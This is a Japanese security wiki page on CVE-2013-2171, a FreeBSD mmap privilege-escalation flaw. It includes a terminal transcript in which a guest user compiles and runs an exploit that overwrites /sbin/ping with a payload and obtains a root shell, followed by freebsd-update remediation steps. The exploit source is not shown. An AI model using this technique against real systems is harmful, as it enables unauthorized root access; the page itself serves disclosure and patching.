CVE-2013-2171 FreeBSD mmapによる権限昇格の脆弱性

提供: セキュリティ
2013年7月5日 (金) 00:36時点におけるDaemon (トーク | 投稿記録)による版

移動: 案内検索
スポンサーリンク


CVE-2013-2171 は、 FreeBSDmmap を利用した権限昇格脆弱性です。


概要

CVE-2013-2171 は、 FreeBSDmmap を利用した権限昇格脆弱性です。

FreeBSD 9.0+ 以上に影響があります。 FreeBSD 9.0R, FreeBSD 9.1R で試しました。

使い方

権限昇格の例は、以下の通りです。

vm% uname -a
FreeBSD vm2.local 9.1-RELEASE-p3 FreeBSD 9.1-RELEASE-p3 #0:
Mon Apr 29 18:11:52 UTC 2013
root@amd64-builder.daemonology.net:/usr/obj/usr/src/sys/GENERIC  i386
vm% id
uid=1008(guest) gid=1001(users) groups=1001(users)
vm% gcc mmap.c
vm% ./a.out
[+] Saved old '/sbin/ping'
[+] Using mmap-ed area at 0x281a4000
[+] Attached to 58383
[+] Copied 4917 bytes of payload to '/sbin/ping'
[+] Triggering payload
# id
uid=0(root) gid=0(wheel) egid=1001(users) groups=1001(users)

対処方法

freebsd-update で更新します。

% sudo freebsd-update fetch
% sudo freebsd-update install

関連項目




スポンサーリンク